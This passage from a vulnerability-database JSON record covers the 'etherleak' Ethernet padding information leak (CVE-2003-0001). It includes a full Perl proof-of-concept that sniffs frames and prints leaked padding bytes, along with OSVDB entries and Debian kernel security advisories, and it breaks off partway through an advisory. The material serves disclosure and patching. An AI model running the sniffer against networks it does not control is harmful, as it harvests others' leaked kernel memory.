"_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-64575", "id": "SSV:64575", "sourceData": "\n #!/usr/bin/perl -w\r\n# etherleak, code that has been 5 years coming.\r\n#\r\n# On 04/27/2002, I disclosed on the Linux Kernel Mailing list,\r\n# a vulnerability that would be come known as the 'etherleak' bug. In\r\n# various situations an ethernet frame must be padded to reach a specific\r\n# size or fall on a certain boundary. This task is left up to the driver\r\n# for the ethernet device. The RFCs state that this padding must consist\r\n# of NULLs. The bug is that at the time and still to this day, many device\r\n# drivers do not pad will NULLs, but rather pad with unsanitized portions\r\n# of kernel memory, oftentimes exposing sensitive information to remote\r\n# systems or those savvy enough to coerce their targets to do so.\r\n#\r\n# Proof of this can be found by googling for 'warchild and etherleak', or\r\n# by visiting:\r\n#\r\n# http://lkml.org/lkml/2002/4/27/101\r\n#\r\n# This was ultimately fixed in the Linux kernel, but over time this\r\n# vulnerability reared its head numerous times, but at the core the\r\n# vulnerability was the same as the one I originally published. The most\r\n# public of these was CVE-2003-0001, which was assigned to address an\r\n# official @stake advisory.\r\n#\r\n# This code can be found its most current form at:\r\n# \r\n# http://spoofed.org/files/exploits/etherleak\r\n#\r\n# Jon Hart <jhart@spoofed.org>, March 2007\r\n#\r\n\r\nuse strict;\r\nuse diagnostics;\r\nuse warnings;\r\nuse Getopt::Long;\r\nuse Net::Pcap;\r\nuse NetPacket::Ethernet qw(:ALL);\r\nuse NetPacket::IP qw(:ALL);\r\n\r\nmy %opts = ();\r\nmy ($iface, $err, $pcap_t, $pcap_save, $filter_string); \r\n\r\nGetOptions( \\%opts, 'help', 'filter=s', 'interface=s', 'quiet', 'read=s', 'write=s', 'verbose') or\r\n die "Unknown option: $!\\n" && &usage();\r\n\r\nif (defined($opts{'help'})) {\r\n &usage();\r\n exit(0);\r\n}\r\n\r\nif (defined($opts{'read'})) {\r\n $pcap_t = Net::Pcap::open_offline($opts{'read'}, \\$err);\r\n if (!defined($pcap_t)) {\r\n print("Net::Pcap::open_offline failed: $err\\n");\r\n exit 1;\r\n }\r\n} else {\r\n if (defined($opts{'interface'})) {\r\n $iface = $opts{'interface'};\r\n } else {\r\n $iface = Net::Pcap::lookupdev(\\$err);\r\n if (defined($err)) {\r\n print(STDERR "lookupdev() failed: $err\\n");\r\n exit(1);\r\n } else {\r\n print(STDERR "No interface specified. Using $iface\\n");\r\n }\r\n }\r\n\r\n $pcap_t = Net::Pcap::open_live($iface, 65535, 1, 0, \\$err);\r\n if (!defined($pcap_t)) {\r\n print("Net::Pcap::open_live failed on $iface: $err\\n");\r\n exit 1;\r\n }\r\n}\r\n\r\nmy $filter;\r\nif (Net::Pcap::compile($pcap_t, \\$filter, defined($opts{'filter'}) ? $opts{'filter'} : "", 0, 0) == -1) {\r\n printf("Net::Pcap::compile failed: %s\\n", Net::Pcap::geterr($pcap_t));\r\n exit(1);\r\n}\r\n\r\nif (Net::Pcap::setfilter($pcap_t, $filter) == -1) {\r\n printf("Net::Pcap::setfilter failed: %s\\n", Net::Pcap::geterr($pcap_t));\r\n exit(1);\r\n}\r\n\r\nif (defined($opts{'write'})) {\r\n $pcap_save = Net::Pcap::dump_open($pcap_t, $opts{'write'});\r\n if (!defined($pcap_save)) {\r\n printf("Net::Pcap::dump_open failed: %s\\n", Net::Pcap::geterr($pcap_t));\r\n exit(1);\r\n }\r\n}\r\n\r\nNet::Pcap::loop($pcap_t, -1, \\&process, "foo");\r\nNet::Pcap::close($pcap_t);\r\n\r\nif (defined($opts{'write'})) {\r\n Net::Pcap::dump_close($pcap_save);\r\n}\r\n\r\n\r\n\r\nsub process {\r\n my ($user, $hdr, $pkt) = @_;\r\n my ($link, $ip);\r\n my $jump = 0;\r\n\r\n my $datalink = Net::Pcap::datalink($pcap_t);\r\n if ($datalink == 1) { $jump += 14; }\r\n elsif ($datalink == 113) { $jump += 16; }\r\n else { printf("Skipping datalink $datalink\\n"); return; }\r\n\r\n my $l2 = NetPacket::Ethernet->decode($pkt);\r\n \r\n if ($l2->{type} == ETH_TYPE_IP) {\r\n $ip = NetPacket::IP->decode(eth_strip($pkt));\r\n $jump += $ip->{len};\r\n } elsif ($l2->{type} == ETH_TYPE_ARP) { $jump += 28; }\r\n else { \r\n # assume 802.3 ethernet, and just jump ahead the length\r\n for ($l2->{dest_mac}) {\r\n if (/^0180c200/) {\r\n # spanning tree\r\n # l2->{type} here will actually be the length. HACK.\r\n $jump += $l2->{type};\r\n }\r\n elsif (/^01000ccccc/) {\r\n # CDP/VTP/DTP/PAgP/UDLD/PVST, etc\r\n # l2->{type} here will actually be the length. HACK.\r\n $jump += $l2->{type};\r\n } elsif (/^ab0000020000/) {\r\n # DEC-MOP-Remote-Console\r\n return;\r\n } else {\r\n # loopback\r\n if ($l2->{src_mac} eq $l2->{dest_mac}) { return; }\r\n printf("Skipping datalink $datalink l2 type %s\\n", $l2->{type}); return;\r\n }\r\n }\r\n }\r\n\r\n\r\n if ($hdr->{len} > $jump) {\r\n my $trailer_bin = substr($pkt, $jump);\r\n my $trailer_hex = "";\r\n my $trailer_ascii = "";\r\n foreach (split(//, $trailer_bin)) {\r\n $trailer_hex .= sprintf("%02x", ord($_));\r\n if (ord($_) >= 32 && ord($_) <= 126) {\r\n $trailer_ascii .= $_;\r\n } else { $trailer_ascii .= "."; }\r\n }\r\n # ignore all trailers that are just single characters repeated.\r\n # most OS' use 0, F, 5 or a.\r\n unless ($trailer_hex =~ /^(0|5|f|a)\\1*$/i) {\r\n unless ($opts{'quiet'}) {\r\n print("#"x80, "\\n");\r\n printf("%s -> %s\\n", $l2->{src_mac}, $l2->{dest_mac});\r\n if ($l2->{type} == ETH_TYPE_IP) {\r\n printf("%s -> %s\\n", $ip->{src_ip}, $ip->{dest_ip});\r\n }\r\n }\r\n print("$trailer_hex\\t$trailer_ascii\\n");\r\n if (defined($opts{'write'})) {\r\n Net::Pcap::dump($pcap_save, $hdr, $pkt);\r\n }\r\n }\r\n }\r\n}\r\n\r\nsub usage {\r\n print <<EOF;\r\n$0 -- A demonstration of the infamous 'etherleak' bug.\r\n\r\n CVE-2003-0001, and countless repeats of the same vulnerability.\r\n\r\n Options:\r\n [-h|--help] # this message\r\n [-i|--interface] <interface> # interface to listen on\r\n [-f|--filter] <pcap filter> # apply this filter to the traffic\r\n [-r|--read] <path to pcap> # read from this saved pcap file\r\n [-w|--write] <path to pcap> # write tothis saved pcap file\r\n [-q|--quiet] # be quiet\r\n [-v|--verbose] # be verbose\r\n\r\nEOF\r\n\r\n\r\n}\r\n\r\n# milw0rm.com [2007-03-23]\r\n\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-64575", "status": "cve,poc"}], "osvdb": [{"lastseen": "2017-04-28T13:19:58", "references": [], "edition": 1, "description": "## Vulnerability Description\nMultiple Ethernet Network Interface Card (NIC) Device Drivers contain flaws that may result in an information leakage vulnerability. The issue is triggered when Ethernet device drivers reuse old frame buffer data to pad packets. It is possible that the flaw may allow that may allow remote attackers to harvest sensitive information from affected devices resulting in a loss of confidentiality.\n## Solution Description\nContact vendor for upgrade to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nMultiple Ethernet Network Interface Card (NIC) Device Drivers contain flaws that may result in an information leakage vulnerability. The issue is triggered when Ethernet device drivers reuse old frame buffer data to pad packets. It is possible that the flaw may allow that may allow remote attackers to harvest sensitive information from affected devices resulting in a loss of confidentiality.\n## References:\n[Vendor Specific Advisory URL](http://www.vmware.com/support/kb/enduser/std_adp.php?p_sid=FsNALBWh&p_lva=&p_faqid=1437)\n[Vendor Specific Advisory URL](http://www.debian.org/security/2003/dsa-311)\n[Vendor Specific Advisory URL](http://itrc.hp.com/cki/bin/doc.pl/screen=ckiSecurityBulletin)\n[Vendor Specific Advisory URL](http://www.linuxsecurity.com/advisories/engarde_advisory-2976.html)\n[Vendor Specific Advisory URL](http://a1851.g.akamaitech.net/f/1851/2996/24h/cache.xerox.com/downloads/usa/en/c/CERT_VU412115.pdf)\n[Secunia Advisory ID:10817](https://secuniaresearch.flexerasoftware.com/advisories/10817/)\n[Secunia Advisory ID:11283](https://secuniaresearch.flexerasoftware.com/advisories/11283/)\n[Related OSVDB ID: 2270](https://vulners.com/osvdb/OSVDB:2270)\n[Related OSVDB ID: 2615](https://vulners.com/osvdb/OSVDB:2615)\nOther Advisory URL: http://www.nextgenss.com/advisories/etherleak-2003.txt\nGeneric Informational URL: http://www.atstake.com/research/advisories/2003/a010603-1.txt\nGeneric Informational URL: http://www.atstake.com/research/advisories/2003/atstake_etherleak_report.pdf\n[CVE-2003-0001](https://vulners.com/cve/CVE-2003-0001)\nCERT VU: 412115\n", "reporter": "OSVDB", "published": "2004-02-09T08:23:38", "type": "osvdb", "title": "Multiple Ethernet Driver Frame Padding Information Disclosure", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "FreeBSD", "version": "4.4", "operator": "eq"}, {"name": "ZyNOS", "version": "V3.40(ES.5)", "operator": "eq"}, {"name": "Kernel", "version": "2.2.20", "operator": "eq"}, {"name": "Kernel", "version": "2.4.1", "operator": "eq"}, {"name": "Kernel", "version": "2.4.18", "operator": "eq"}, {"name": "JetDirect", "version": "J6035A", "operator": "eq"}, {"name": "Kernel", "version": "2.4.10", "operator": "eq"}, {"name": "Kernel", "version": "2.2.15", "operator": "eq"}, {"name": "Kernel", "version": "2.4.13", "operator": "eq"}, {"name": "Kernel", "version": "2.4.3", "operator": "eq"}, {"name": "Kernel", "version": "2.4.15", "operator": "eq"}, {"name": "Kernel", "version": "2.4.17", "operator": "eq"}, {"name": "Kernel", "version": "2.2.19", "operator": "eq"}, {"name": "FreeBSD", "version": "4.3", "operator": "eq"}, {"name": "Kernel", "version": "2.4.8", "operator": "eq"}, {"name": "Kernel", "version": "2.4.12", "operator": "eq"}, {"name": "FreeBSD", "version": "4.7", "operator": "eq"}, {"name": "Kernel", "version": "2.4.2", "operator": "eq"}, {"name": "Kernel", "version": "2.4.16", "operator": "eq"}, {"name": "Kernel", "version": "2.4.5", "operator": "eq"}, {"name": "Kernel", "version": "2.2.16", "operator": "eq"}, {"name": "Kernel", "version": "2.2.14", "operator": "eq"}, {"name": "HP-UX", "version": "11.0", "operator": "eq"}, {"name": "FreeBSD", "version": "4.2", "operator": "eq"}, {"name": "Kernel", "version": "2.2.17", "operator": "eq"}, {"name": "FreeBSD", "version": "4.5", "operator": "eq"}, {"name": "Kernel", "version": "2.4.9", "operator": "eq"}, {"name": "Kernel", "version": "2.4.4", "operator": "eq"}, {"name": "Kernel", "version": "2.4.14", "operator": "eq"}, {"name": "FreeBSD", "version": "4.6", "operator": "eq"}, {"name": "Kernel", "version": "2.4.6", "operator": "eq"}, {"name": "Kernel", "version": "2.4.11", "operator": "eq"}, {"name": "Kernel", "version": "2.4.7", "operator": "eq"}, {"name": "Kernel", "version": "2.0.x", "operator": "eq"}, {"name": "HP-UX", "version": "10.20", "operator": "eq"}, {"name": "Kernel", "version": "2.2.18", "operator": "eq"}], "cvelist": ["CVE-2003-0001"], "modified": "2004-02-09T08:23:38", "href": "https://vulners.com/osvdb/OSVDB:3873", "id": "OSVDB:3873", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-04-28T13:20:05", "references": [], "edition": 1, "description": "## Vulnerability Description\nSome ZyXEL Prestige devices contains a flaw that may lead to an unauthorized information disclosure. \u00a0ARP requests emitted by device could contain random parts of the memory (especially parts of recent telnet sessions) , which will disclose sensitive information to an attacker able to sniff the local network resulting in a loss of confidentiality.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nSome ZyXEL Prestige devices contains a flaw that may lead to an unauthorized information disclosure. \u00a0ARP requests emitted by device could contain random parts of the memory (especially parts of recent telnet sessions) , which will disclose sensitive information to an attacker able to sniff the local network resulting in a loss of confidentiality.\n## References:\nVendor URL: http://www.zyxel.com/\nSecurity Tracker: 1008999\nMail List Post: http://whitestar.linuxbox.org/pipermail/exploits/2007-March/000165.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-09/0127.html\nISS X-Force ID: 17372\n[CVE-2004-1684](https://vulners.com/cve/CVE-2004-1684)\n[CVE-2003-0001](https://vulners.com/cve/CVE-2003-0001)\nBugtraq ID: 11167\n", "reporter": "Przemyslaw Frasunek(venglin@freebsd.lublin.pl)", "published": "2004-09-13T00:00:00", "type": "osvdb", "title": "ZyXEL Prestige 681 ARP Request Packet Information Disclosure", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Prestige 681", "version": "Unknown or Unspecified", "operator": "eq"}, {"name": "ZyNOS", "version": "Vt020225a", "operator": "eq"}], "cvelist": ["CVE-2003-0001", "CVE-2004-1684"], "modified": "2004-09-13T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:9962", "id": "OSVDB:9962", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "debian": [{"lastseen": "2018-10-16T22:14:07", "references": [], "affectedPackage": [], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 336-2 security@debian.org\nhttp://www.debian.org/security/ Matt Zimmerman\nJune 29th, 2003 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : kernel-source-2.2.20, kernel-image-2.2.20-i386\nVulnerability : several\nProblem-Type : local, remote\nDebian-specific: no\nCVE Ids : CVE-2002-0429 CAN-2003-0001 CAN-2003-0127 CAN-2003-0364 CAN-2002-1380\n\nNOTE: This advisory is being released as a factual correction to\nDSA-336-1. In an administrative error, DSA-336-1 listed several CVE\nnames which did not, in fact, apply to Linux 2.2.20, and omitted one\nvulnerability which was fixed in the updated packages. The packages\nare (and were) correct, and remain unchanged. The package changelog\ncontains the correct information. This advisory provides updated\ninformation only.\n\nA number of vulnerabilities have been discovered in the Linux kernel.\n\n- - CVE-2002-0429: The iBCS routines in arch/i386/kernel/traps.c for\n Linux kernels 2.4.18 and earlier on x86 systems allow local users to\n kill arbitrary processes via a a binary compatibility interface\n (lcall)\n\n- - CAN-2003-0001: Multiple ethernet Network Interface Card (NIC) device\n drivers do not pad frames with null bytes, which allows remote\n attackers to obtain information from previous packets or kernel\n memory by using malformed packets\n\n- - CAN-2003-0127: The kernel module loader allows local users to gain\n root privileges by using ptrace to attach to a child process that is\n spawned by the kernel\n\n- - CAN-2003-0364: The TCP/IP fragment reassembly handling in the Linux\n kernel 2.4 allows remote attackers to cause a denial of service (CPU\n consumption) via certain packets that cause a large number of hash\n table collisions\n\n- - CAN-2002-1380: Linux kernel 2.2.x allows local users to cause a\n denial of service (crash) by using the mmap() function with a\n PROT_READ parameter to access non-readable memory pages through the\n /proc/pid/mem interface.\n\nThis advisory provides updated 2.2.20 kernel source, and binary kernel\nimages for the i386 architecture. Other architectures and kernel\nversions will be covered by separate advisories.\n\nFor the stable distribution (woody) on the powerpc architecture, these\nproblems have been fixed in kernel-source-2.2.20 version\n2.2.20-5woody2 and kernel-image-i386 version 2.2.20-5woody3.\n\nFor the unstable distribution (sid) these problems are fixed in\nkernel-source-2.2.25 and kernel-image-2.2.25-i386 version 2.2.25-2.\n\nWe recommend that you update your kernel packages.\n\nNOTE: A system reboot will be required immediately after the upgrade\nin order to replace the running kernel. Remember to read carefully\nand follow the instructions given during the kernel upgrade process.\n\nNOTE: These kernels are not binary-compatible with the previous\nversion. Any loadable modules will need to be recompiled in order to\nwork with the new kernel.\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/k/kernel-source-2.2.20/kernel-source-2.2.20_2.2.20-5woody2.dsc\n Size/MD5 checksum: 661 d3215fce4f216c046cccff92446e7918\n http://security.debian.org/pool/updates/main/k/kernel-source-2.2.20/kernel-source-2.2.20_2.2.20-5woody2.diff.gz\n Size/MD5 checksum: 159446 a579fda249086961d987de8781049f78\n http://security.debian.org/pool/updates/main/k/kernel-source-2.2.20/kernel-source-2.2.20_2.2.20.orig.tar.gz\n Size/MD5 checksum: 19394649 57c0edf86cb23a5b215db9121c9b3557\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.20-i386/kernel-image-2.2.20-i386_2.2.20-5woody3.dsc\n Size/MD5 checksum: 834 fa03ee805dd5024d730f49e0316dbf53\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.20-i386/kernel-image-2.2.20-i386_2.2.20-5woody3.tar.gz\n Size/MD5 checksum: 13928 0ccb61809634f83fd20de3079deb297c\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/k/kernel-source-2.2.20/kernel-doc-2.2.20_2.2.20-5woody2_all.deb\n Size/MD5 checksum: 1162314 d3f23563af939c6d1f68860ce0419744\n http://security.debian.org/pool/updates/main/k/kernel-source-2.2.20/kernel-source-2.2.20_2.2.20-5woody2_all.deb\n Size/MD5 checksum: 15848472 0682fd4283579c341fa9ca27461cbad0\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.20-i386/kernel-headers-2.2.20_2.2.20-5woody3_i386.deb\n Size/MD5 checksum: 1918624 d1d1f98e147fdf12a7374ff705ba89a7\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.20-i386/kernel-headers-2.2.20-compact_2.2.20-5woody3_i386.deb\n Size/MD5 checksum: 1867132 93d8ac12f8a884913ad88aeeb7a8ea1b\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.20-i386/kernel-headers-2.2.20-idepci_2.2.20-5woody3_i386.deb\n Size/MD5 checksum: 1839328 e3fb8a95dd2a1ba641fd598a019879c0\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.20-i386/kernel-image-2.2.20_2.2.20-5woody3_i386.deb\n Size/MD5 checksum: 5901626 3fa8bae1676466e02992a1ce80009697\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.20-i386/kernel-image-2.2.20-compact_2.2.20-5woody3_i386.deb\n Size/MD5 checksum: 1733362 5d5293e99f68cbabb1489226903f4895\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.20-i386/kernel-image-2.2.20-idepci_2.2.20-5woody3_i386.deb\n Size/MD5 checksum: 1395212 70389d3561e392a5487b493d24e2abfe\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 1, "reporter": "Debian", "published": "2003-06-30T00:00:00", "title": "[SECURITY] [DSA-336-2] Factual correction for DSA-336-1", "type": "debian", "enchantments": {"score": {"modified": "2018-10-16T22:14:07", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2002-0429", "CVE-2003-0127", "CVE-2003-0364", "CVE-2003-0001", "CVE-2002-1380"], "modified": "2003-06-30T00:00:00", "id": "DEBIAN:DSA-336-2:E162C", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2003/msg00133.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-16T22:14:29", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "3", "packageVersion": "2.4.18-1woody1", "arch": "all", "packageFilename": "kernel-image-2.4.18-powerpc_2.4.18-1woody1_all.deb", "packageName": "kernel-image-2.4.18-powerpc", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3", "packageVersion": "2.4.18-1woody1", "arch": "all", "packageFilename": "kernel-headers-2.4.18_2.4.18-1woody1_all.deb", "packageName": "kernel-headers-2.4.18", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3", "packageVersion": "2.4.18-1woody1", "arch": "all", "packageFilename": "kernel-patch-2.4.18-powerpc_2.4.18-1woody1_all.deb", "packageName": "kernel-patch-2.4.18-powerpc", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3", "packageVersion": "2.4.18-1woody1", "arch": "all", "packageFilename": "kernel-image-2.4.18-newpmac_2.4.18-1woody1_all.deb", "packageName": "kernel-image-2.4.18-newpmac", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3", "packageVersion": "2.4.18-1woody1", "arch": "all", "packageFilename": "kernel-image-2.4.18-powerpc-smp_2.4.18-1woody1_all.deb", "packageName": "kernel-image-2.4.18-powerpc-smp", "operator": "lt"}], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 312-1 security@debian.org\nhttp://www.debian.org/security/ Matt Zimmerman\nJune 9th, 2003 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : kernel-patch-2.4.18-powerpc\nVulnerability : several\nProblem-Type : local, remote\nDebian-specific: no\nCVE Ids : CVE-2002-0429 CAN-2003-0001 CAN-2003-0127 CAN-2003-0244 CAN-2003-0246 CAN-2003-0247 CAN-2003-0248 CAN-2003-0364\n\nA number of vulnerabilities have been discovered in the Linux kernel.\n\n- - CVE-2002-0429: The iBCS routines in arch/i386/kernel/traps.c for\n Linux kernels 2.4.18 and earlier on x86 systems allow local users to\n kill arbitrary processes via a a binary compatibility interface\n (lcall)\n\n- - CAN-2003-0001: Multiple ethernet Network Interface Card (NIC) device\n drivers do not pad frames with null bytes, which allows remote\n attackers to obtain information from previous packets or kernel\n memory by using malformed packets\n\n- - CAN-2003-0127: The kernel module loader allows local users to gain\n root privileges by using ptrace to attach to a child process that is\n spawned by the kernel\n\n- - CAN-2003-0244: The route cache implementation in Linux 2.4, and the\n Netfilter IP conntrack module, allows remote attackers to cause a\n denial of service (CPU consumption) via packets with forged source\n addresses that cause a large number of hash table collisions related\n to the PREROUTING chain\n\n- - CAN-2003-0246: The ioperm system call in Linux kernel 2.4.20 and\n earlier does not properly restrict privileges, which allows local\n users to gain read or write access to certain I/O ports.\n\n- - CAN-2003-0247: vulnerability in the TTY layer of the Linux kernel\n 2.4 allows attackers to cause a denial of service ("kernel oops")\n\n- - CAN-2003-0248: The mxcsr code in Linux kernel 2.4 allows attackers\n to modify CPU state registers via a malformed address.\n\n- - CAN-2003-0364: The TCP/IP fragment reassembly handling in the Linux\n kernel 2.4 allows remote attackers to cause a denial of service (CPU\n consumption) via certain packets that cause a large number of hash\n table collisions\n\nThis advisory covers only the powerpc architecture. Other\narchitectures will be covered by separate advisories.\n\nFor the stable distribution (woody) on the powerpc architecture, these\nproblems have been fixed in version 2.4.18-1woody1.\n\nFor the unstable distribution (sid) these problems are fixed in\nversion 2.4.20-2.\n\nWe recommend that you update your kernel packages.\n\nNOTE: A system reboot will be required immediately after the upgrade\nin order to replace the running kernel. Remember to read carefully\nand follow the instructions given during the kernel upgrade process.\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.18-powerpc/kernel-patch-2.4.18-powerpc_2.4.18-1woody1.dsc\n Size/MD5 checksum: 713 5e68ebec8c5964802d1c408dbb62d910\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.18-powerpc/kernel-patch-2.4.18-powerpc_2.4.18-1woody1.tar.gz\n Size/MD5 checksum: 79339 bfb459f978ac40898f8e10d5e302873d\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.18-powerpc/kernel-patch-2.4.18-powerpc_2.4.18-1woody1_all.deb\n Size/MD5 checksum: 78796 63903e7035ddc4c3c054d18c485aa54f\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.18-powerpc/kernel-headers-2.4.18_2.4.18-1woody1_powerpc.deb\n Size/MD5 checksum: 3415000 6aeb5eab8171baf83cb8e81a30c9397f\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.18-powerpc/kernel-image-2.4.18-newpmac_2.4.18-1woody1_powerpc.deb\n Size/MD5 checksum: 9450540 b66d57ddaa4d7dffe99024250935cee2\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.18-powerpc/kernel-image-2.4.18-powerpc_2.4.18-1woody1_powerpc.deb\n Size/MD5 checksum: 10134844 b5e105cc2087c65889ea83eb29fd91ae\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.18-powerpc/kernel-image-2.4.18-powerpc-smp_2.4.18-1woody1_powerpc.deb\n Size/MD5 checksum: 10379272 6829c60296a049950d79ddd0a488f8d4\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 1, "reporter": "Debian", "published": "2003-06-09T00:00:00", "title": "[SECURITY] [DSA-312-1] New powerpc kernel fixes several vulnerabilities", "type": "debian", "enchantments": {"score": {"modified": "2018-10-16T22:14:29", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2003-0248", "CVE-2003-0247", "CVE-2002-0429", "CVE-2003-0127", "CVE-2003-0364", "CVE-2003-0001", "CVE-2003-0246", "CVE-2003-0244"], "modified": "2003-06-09T00:00:00", "id": "DEBIAN:DSA-312-1:543C3", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2003/msg00102.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-16T22:12:57", "references": [], "affectedPackage": [], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 336-1 security@debian.org\nhttp://www.debian.org/security/ Matt Zimmerman\nJune 29th, 2003 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : kernel-source-2.2.20, kernel-image-2.2.20-i386\nVulnerability : several\nProblem-Type : local, remote\nDebian-specific: no\nCVE Ids : CVE-2002-0429 CAN-2003-0001 CAN-2003-0127 CAN-2003-0244 CAN-2003-0246 CAN-2003-0247 CAN-2003-0248 CAN-2003-0364\n\nA number of vulnerabilities have been discovered in the Linux kernel.\n\n- - CVE-2002-0429: The iBCS routines in arch/i386/kernel/traps.c for\n Linux kernels 2.4.18 and earlier on x86 systems allow local users to\n kill arbitrary processes via a a binary compatibility interface\n (lcall)\n\n- - CAN-2003-0001: Multiple ethernet Network Interface Card (NIC) device\n drivers do not pad frames with null bytes, which allows remote\n attackers to obtain information from previous packets or kernel\n memory by using malformed packets\n\n- - CAN-2003-0127: The kernel module loader allows local users to gain\n root privileges by using ptrace to attach to a child process that is\n spawned by the kernel\n\n- - CAN-2003-0244: The route cache implementation in Linux 2.4, and the\n Netfilter IP conntrack module, allows remote attackers to cause a\n denial of service (CPU consumption) via packets with forged source\n addresses that cause a large number of hash table collisions related\n to the PREROUTING chain\n\n- - CAN-2003-0246: The ioperm system call in Linux kernel 2.4.20 and\n earlier does not properly restrict privileges, which allows local\n users to gain read or write access to certain I/O ports.\n\n- - CAN-2003-0247: vulnerability in the TTY layer of the Linux kernel\n 2.4 allows attackers to cause a denial of service ("kernel oops")\n\n- - CAN-2003-0248: The mxcsr code in Linux kernel 2.4 allows attackers\n to modify CPU state registers via a malformed address.\n\n- - CAN-2003-0364: The TCP/IP fragment reassembly handling in the Linux\n kernel 2.4 allows remote attackers to cause a denial of service (CPU\n consumption) via certain packets that cause a large number of hash\n table collisions\n\nThis advisory provides updated 2.2.20 kernel source, and binary kernel\nimages for the i386 architecture. Other architectures and kernel\nversions will be covered by separate advisories.\n\nFor the stable distribution (woody) on the powerpc architecture, these\nproblems have been fixed in kernel-source-2.2.20 version\n2.2.20-5woody2 and kernel-image-i386 version 2.2.20-5woody3.\n\nFor the unstable distribution (sid) these problems are fixed in\nkernel-source-2.2.25 and kernel-image-2.2.25-i386 version 2.2.25-2.\n\nWe recommend that you update your kernel packages.\n\nNOTE: A system reboot will be required immediately after the upgrade\nin order to replace the running kernel. Remember to read carefully\nand follow the instructions given during the kernel upgrade process.\n\nNOTE: These kernels are not binary-compatible with the previous\nversion. Any loadable modules will need to be recompiled in order to\nwork with the new kernel.\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n 